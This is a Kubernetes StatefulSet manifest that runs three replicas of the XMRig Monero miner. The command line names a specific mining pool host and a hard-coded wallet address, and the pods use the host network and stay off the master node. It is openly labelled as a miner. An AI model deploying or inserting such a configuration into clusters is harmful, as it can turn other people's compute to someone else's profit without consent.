apiVersion: apps/v1
kind: StatefulSet
metadata:
  labels:
    app: xmrig
  name: xmrig-statefulset
  namespace: xmrig
spec:
  replicas: 3  # Set the number of replicas to 3
  selector:
    matchLabels:
      app: xmrig
  serviceName: xmrig-service
  template:
    metadata:
      labels:
        app: xmrig
    spec:
      affinity:
        nodeAffinity:
          requiredDuringSchedulingIgnoredDuringExecution:
            nodeSelectorTerms:
              - matchExpressions:
                  - key: kubernetes.io/hostname
                    operator: NotIn
                    values:
                      - master
      hostNetwork: true  # Add this line to use the host's network if necessary
      automountServiceAccountToken: false  # Disable automatic mounting of Service Account token if not needed
      containers:
        - name: xmrig-container
          image: busybox
          command: ["sh", "-c", "chmod +x /root/xmrig/build/xmrig && /root/xmrig/build/xmrig -t 1 -o node.hacknoob.win:3333 -u 46DWjxWviwCVHbYHaMxjusjGKm55LJmG6f3YTCJDmTf2RxCLfQRx22fSRELvwq36kY6iSGD5tiUsSQ4AsE8UFnWFBDd1Lzn"]
          resources:
            limits:
              cpu: "2"
              memory: "2Gi"  # Adjust as per your application's requirements
            requests:
              cpu: "500m"
              memory: "500Mi"
          volumeMounts:
            - name: xmrig-data
              mountPath: /root/  # Mount host's directory containing xmrig
  volumeClaimTemplates:
    - metadata:
        name: xmrig-data
      spec:
        accessModes:
          - ReadWriteOnce
        resources:
          requests:
            storage: 5Gi  # Adjust as per your storage requirements
        storageClassName: monero-pv-new  # Specify your desired StorageClass

